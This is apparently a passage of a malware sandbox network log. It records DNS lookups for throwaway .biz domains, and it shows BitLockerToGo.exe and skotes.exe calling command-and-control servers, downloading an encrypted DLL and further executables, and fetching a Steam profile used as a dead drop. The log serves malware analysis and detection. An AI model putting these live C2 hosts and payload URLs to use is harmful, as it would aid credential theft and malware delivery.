                                                            host: consent.youtube.com
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                                            accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            accept-language: en-US,en;q=0.5
                                                            accept-encoding: gzip, deflate, br
                                                            cookie: SOCS=CAAaBgiA4dm9Bg
                                                            cookie: YSC=FPzc_R47wZ4
                                                            cookie: __Secure-YEC=CgtvR0VaMnB1NDR0NCiD79y9BjIKCgJHQhIEGgAgGw%3D%3D
                                                            cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgGw%3D%3D
                                                            upgrade-insecure-requests: 1
                                                            sec-fetch-dest: document
                                                            sec-fetch-mode: navigate
                                                            sec-fetch-site: none
                                                            sec-fetch-user: ?1
                                                            te: trailers
                                                          • flag-us
                                                            DNS
                                                            consent.youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            consent.youtube.com
                                                            IN A
                                                            Response
                                                            consent.youtube.com
                                                            IN A
                                                            216.58.201.110
                                                          • flag-us
                                                            DNS
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN A
                                                            Response
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN A
                                                            34.107.152.202
                                                          • flag-us
                                                            DNS
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN AAAA
                                                            Response
                                                            attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                                            IN AAAA
                                                            2600:1901:0:712f::
                                                          • flag-us
                                                            DNS
                                                            consent.youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            consent.youtube.com
                                                            IN AAAA
                                                            Response
                                                            consent.youtube.com
                                                            IN AAAA
                                                            2a00:1450:4009:826::200e
                                                          • flag-us
                                                            DNS
                                                            www.google.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            www.google.com
                                                            IN A
                                                            Response
                                                            www.google.com
                                                            IN A
                                                            142.250.200.4
                                                          • flag-gb
                                                            GET
                                                            https://www.google.com/favicon.ico
                                                            firefox.exe
                                                            Remote address:
                                                            142.250.200.4:443
                                                            Request
                                                            GET /favicon.ico HTTP/2.0
                                                            host: www.google.com
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                                            accept: image/avif,image/webp,*/*
                                                            accept-language: en-US,en;q=0.5
                                                            accept-encoding: gzip, deflate, br
                                                            referer: https://consent.youtube.com/
                                                            sec-fetch-dest: image
                                                            sec-fetch-mode: no-cors
                                                            sec-fetch-site: cross-site
                                                            te: trailers
                                                          • flag-us
                                                            DNS
                                                            www.google.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            www.google.com
                                                            IN A
                                                            Response
                                                            www.google.com
                                                            IN A
                                                            142.250.200.4
                                                          • flag-us
                                                            DNS
                                                            www.google.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            www.google.com
                                                            IN AAAA
                                                            Response
                                                            www.google.com
                                                            IN AAAA
                                                            2a00:1450:4009:822::2004
                                                          • flag-us
                                                            DNS
                                                            consent.youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            consent.youtube.com
                                                            IN A
                                                            Response
                                                            consent.youtube.com
                                                            IN A
                                                            216.58.201.110
                                                          • flag-us
                                                            DNS
                                                            consent.youtube.com
                                                            firefox.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            consent.youtube.com
                                                            IN A
                                                            Response
                                                            consent.youtube.com
                                                            IN A
                                                            216.58.201.110
                                                          • flag-us
                                                            DNS
                                                            edcatiofireeu.shop
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            edcatiofireeu.shop
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            impolitewearr.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            impolitewearr.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            toppyneedus.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            toppyneedus.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            lightdeerysua.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            lightdeerysua.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            suggestyuoz.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            suggestyuoz.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            hoursuhouy.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            hoursuhouy.biz
                                                            IN A
                                                            Response
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/success?substr=mixfour&s=three&sub=non
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /success?substr=mixfour&s=three&sub=non HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:24 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/info
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /info HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:24 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 21
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/update
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /update HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:24 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                            Content-Length: 99856
                                                            Keep-Alive: timeout=5, max=98
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:25 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=97
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:27 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=96
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:29 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=95
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:31 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=94
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:33 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=93
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:35 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=92
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-us
                                                            DNS
                                                            mixedrecipew.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            mixedrecipew.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            affordtempyo.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            affordtempyo.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            affordtempyo.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            affordtempyo.biz
                                                            IN A
                                                            Response
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/success?substr=mixtwo&s=three&sub=non
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /success?substr=mixtwo&s=three&sub=non HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:26 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/info
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /info HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:27 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 21
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/update
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /update HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:27 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                            Content-Length: 99856
                                                            Keep-Alive: timeout=5, max=98
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:27 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=97
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:29 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=96
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:31 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=95
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:33 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=94
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:36 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=93
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-us
                                                            DNS
                                                            pleasedcfrown.biz
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            pleasedcfrown.biz
                                                            IN A
                                                            Response
                                                          • flag-us
                                                            DNS
                                                            steamcommunity.com
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            steamcommunity.com
                                                            IN A
                                                            Response
                                                            steamcommunity.com
                                                            IN A
                                                            104.82.234.109
                                                          • flag-gb
                                                            GET
                                                            https://steamcommunity.com/profiles/76561199724331900
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            104.82.234.109:443
                                                            Request
                                                            GET /profiles/76561199724331900 HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Host: steamcommunity.com
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Content-Type: text/html; charset=UTF-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                            Cache-Control: no-cache
                                                            Date: Thu, 20 Feb 2025 14:09:28 GMT
                                                            Content-Length: 29488
                                                            Connection: keep-alive
                                                            Set-Cookie: sessionid=42dee8c011e714ceca4cdac2; Path=/; Secure; SameSite=None
                                                            Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                          • 185.215.113.43:80
                                                            http://185.215.113.43/Zu7JuNko/index.php
                                                            http
                                                            skotes.exe
                                                            8.6kB
                                                            10.6kB
                                                            64
                                                            43

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            POST http://185.215.113.43/Zu7JuNko/index.php

                                                            HTTP Response

                                                            200
                                                          • 185.215.113.75:80
                                                            http://185.215.113.75/files/martin2/random.exe
                                                            http
                                                            skotes.exe
                                                            897.5kB
                                                            49.5MB
                                                            18809
                                                            35479

                                                            HTTP Request

                                                            GET http://185.215.113.75/files/5983277008/sQ3DZPU.exe

                                                            HTTP Response

                                                            200

                                                            HTTP Request

                                                            GET http://185.215.113.75/files/7222648325/a1EoH8b.exe

